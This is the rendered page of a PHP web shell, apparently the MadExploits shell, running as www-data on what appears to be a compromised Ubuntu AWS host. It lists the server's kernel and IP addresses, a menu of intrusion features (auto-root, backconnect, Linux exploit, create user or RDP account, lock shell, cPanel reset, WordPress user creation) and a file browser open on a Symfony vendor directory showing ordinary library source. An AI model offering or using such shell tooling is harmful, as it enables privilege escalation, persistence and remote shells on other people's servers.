Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.139.64.39
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
config /
Loader /
[ HOME SHELL ]
Name
Size
Permission
Action
DelegatingLoader.php
1.25
KB
-rw-rw-r--
FileLoader.php
5.96
KB
-rw-rw-r--
GlobFileLoader.php
728
B
-rw-rw-r--
Loader.php
1.82
KB
-rw-rw-r--
LoaderInterface.php
1.21
KB
-rw-rw-r--
LoaderResolver.php
1.55
KB
-rw-rw-r--
LoaderResolverInterface.php
802
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DelegatingLoader.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config\Loader; use Symfony\Component\Config\Exception\LoaderLoadException; /** * DelegatingLoader delegates loading to other loaders using a loader resolver. * * This loader acts as an array of LoaderInterface objects - each having * a chance to load a given resource (handled by the resolver) * * @author Fabien Potencier <fabien@symfony.com> */ class DelegatingLoader extends Loader { public function __construct(LoaderResolverInterface $resolver) { $this->resolver = $resolver; } /** * {@inheritdoc} */ public function load($resource, string $type = null) { if (false === $loader = $this->resolver->resolve($resource, $type)) { throw new LoaderLoadException($resource, null, null, null, $type); } return $loader->load($resource, $type); } /** * {@inheritdoc} */ public function supports($resource, string $type = null) { return false !== $this->resolver->resolve($resource, $type); } }
Close